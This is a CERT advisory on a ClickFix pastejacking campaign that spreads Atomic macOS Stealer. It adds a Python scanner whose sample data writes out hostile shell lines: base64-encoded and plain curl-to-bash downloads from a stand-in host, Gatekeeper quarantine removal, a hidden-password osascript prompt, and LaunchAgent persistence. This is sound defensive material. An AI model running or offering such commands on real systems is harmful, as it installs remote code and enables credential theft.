Thursday April 23, 2026

Advisory ID:   ngCERT-2026-040001

SUMMARY

ngCERT is aware of an ongoing ClickFix (pastejacking) campaign targeting developers and users of AI tools. The campaign distributes Atomic macOS Stealer (AMOS), an information-stealing malware family targeting macOS systems. The attack relies on social engineering rather than a software vulnerability: victims are tricked into pasting and running malicious commands in Terminal themselves. Organisations and individuals are strongly advised to exercise caution and implement appropriate security controls.

DESCRIPTION

ClickFix (pastejacking) is a social engineering technique that manipulates users into copying and executing malicious commands from deceptive sources such as fake documentation pages, malicious advertisements, or AI-generated content. The text placed on the clipboard need not match what the page displays; a page can rewrite the copied text so that a harmless-looking instruction pastes as a malicious one. In this campaign, attackers disguise harmful terminal commands as legitimate setup or troubleshooting instructions, often obfuscating them with encoding techniques such as base64 so that the command's purpose is not visible to the user. Once executed, these commands download and install AMOS. The malware establishes persistence on the compromised system, harvests sensitive information (including credentials and files), and may deploy additional backdoors to enable persistent remote access.

Damage:      Critical

Probability:  High

Platform(s):  macOS

CONSEQUENCES

If the lure succeeds, this campaign may result in:

    1. Credential theft, including browser-stored passwords and Apple Keychain data.
    2. Unauthorized remote access through backdoor mechanisms.
    3. Data exfiltration, including sensitive files and developer assets.
    4. Compromise of cryptocurrency wallets and financial information.
    5. Deployment of additional malware and further system exploitation.
    6. Organisational risks such as supply chain compromise and credential leakage.

SOLUTION/MITIGATION

ngCERT recommends the following:

    1. Avoid executing terminal commands from untrusted sources, including advertisements, unknown websites, or unverified AI-generated content
    2. Verify all documentation and instructions, ensuring they originate from official vendor domains
    3. Educate users and developers on pastejacking techniques and social engineering risks
    4. Deploy Endpoint Detection and Response (EDR) solutions to monitor suspicious shell activity
    5. Restrict and monitor script execution on macOS systems
    6. Enable and maintain built-in protections such as Gatekeeper and XProtect, noting that a script fetched with curl and piped straight into a shell never receives the com.apple.quarantine attribute, so Gatekeeper alone does not block this delivery path
    7. Regularly update macOS and security tools to detect emerging threats
    8. Monitor for unusual outbound network traffic and unauthorized persistence mechanisms
    9. Implement least-privilege access controls to limit the impact of compromised accounts
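The command patterns described under DESCRIPTION (base64-obfuscated commands that download and run a payload) and the shell-activity monitoring recommended in items 4, 5 and 8 can be checked with a small heuristic scanner over shell history or EDR command-line telemetry. The following is an added example written for this advisory; it is not ngCERT tooling, not a published detection rule, and not code from the campaign. The rule names, the 20-character base64 threshold, and the sample command lines are constructed for illustration, and the URLs use the reserved example.invalid domain.

```python
"""Heuristic scanner for ClickFix-style shell command lines (added example)."""
import base64
import re

# Illustrative heuristics for the command patterns described in the advisory.
# Names and patterns are this example's own choices, not published detections.
RULES = [
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("remote_script_to_shell",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("quarantine_removal",
     re.compile(r"\bxattr\b.*(?:\s-c\b|com\.apple\.quarantine)")),
    ("hidden_password_prompt",
     re.compile(r"\bosascript\b.*\bhidden answer\b")),
    ("launch_agent_persistence",
     re.compile(r"Library/LaunchAgents/[^\s]+\.plist")),
]

# A run of 20+ base64-alphabet characters is treated as a candidate payload.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_base64_tokens(command):
    """Return printable UTF-8 text recovered from base64-looking tokens."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # bad padding, non-alphabet byte, or not UTF-8
            continue
        if all(ch.isprintable() or ch.isspace() for ch in text):
            decoded.append(text)
    return decoded


def scan_command(command, depth=0):
    """Return [(rule_name, matched_text), ...] for one command line.

    Base64 payloads found in the line are decoded and scanned recursively, so
    an encoded `curl ... | sh` is reported even though the visible command only
    shows `echo <blob> | base64 -d | bash`. Recursion is bounded because an
    attacker can nest encodings.
    """
    hits = []
    for name, pattern in RULES:
        match = pattern.search(command)
        if match:
            hits.append((name, match.group(0)))
    if depth < 2:
        for text in decode_base64_tokens(command):
            hits.extend((f"decoded:{name}", matched)
                        for name, matched in scan_command(text, depth + 1))
    return hits


def scan_history(lines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    findings = {}
    for line in lines:
        hits = scan_command(line)
        if hits:
            findings[line] = hits
    return findings


# Constructed sample telemetry (one command line per record, as a shell history
# or EDR collector might report it). Invented for this example; not real IOCs.
ENCODED_STAGE = base64.b64encode(
    b"curl -fsSL http://example.invalid/i.sh | bash").decode()
SAMPLE_COMMANDS = [
    "git clone https://example.invalid/repo.git",
    f"echo '{ENCODED_STAGE}' | base64 -d | bash",
    "curl -fsSL http://example.invalid/setup.sh | sh",
    "xattr -d com.apple.quarantine ~/Downloads/Installer.dmg",
    "osascript -e 'display dialog \"Update required\" default answer \"\" with hidden answer'",
    "launchctl load ~/Library/LaunchAgents/com.example.update.plist",
    "brew install wget",
]

if __name__ == "__main__":
    for cmd, hits in scan_history(SAMPLE_COMMANDS).items():
        print(cmd)
        for rule, matched in hits:
            print(f"    {rule}: {matched}")
```

Run against a real `~/.zsh_history` or an EDR export, the `decoded:` prefix on a hit is the signal that matters most here: it shows the user saw only an opaque blob, which is exactly the ClickFix pattern the advisory describes. Treat the rules as triage heuristics to be tuned per environment, not as a blocklist; legitimate install scripts also use `curl | sh`.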

HYPERLINK